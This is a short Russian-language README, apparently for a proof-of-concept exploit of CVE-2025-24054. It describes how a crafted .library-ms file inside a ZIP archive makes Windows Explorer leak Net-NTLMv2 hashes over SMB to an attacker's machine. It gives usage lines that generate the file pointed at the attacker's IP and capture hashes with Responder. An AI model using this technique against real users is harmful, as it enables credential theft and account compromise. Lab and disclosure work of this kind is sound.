
Доказательство концепции эксплуатации CVE-2025-24054 — уязвимости раскрытия NTLM-хэшей в Windows Library (.library-ms). Генерирует вредоносный файл .library-ms для утечки хэшей Net-NTLMv2 через SMB при извлечении из ZIP-архива.
Простой Proof of Concept для CVE-2025-24054 — уязвимость раскрытия NTLM-хэша через библиотеки Windows (.library-ms).
⚠️ Только для образовательных целей и авторизованного лабораторного использования
CVE-2025-24054 позволяет атакующему заставить систему Windows раскрыть хэш Net-NTLMv2 жертвы с помощью специально созданного файла .library-ms.
Когда жертва извлекает ZIP-архив, содержащий вредоносный файл .library-ms, проводник Windows автоматически инициирует SMB-подключение, раскрывая NTLM-хэш.
.library-ms, содержащий UNC-путь, указывающий на его машину.
python poc.py -i YOUR-IP
sudo responder -I eth0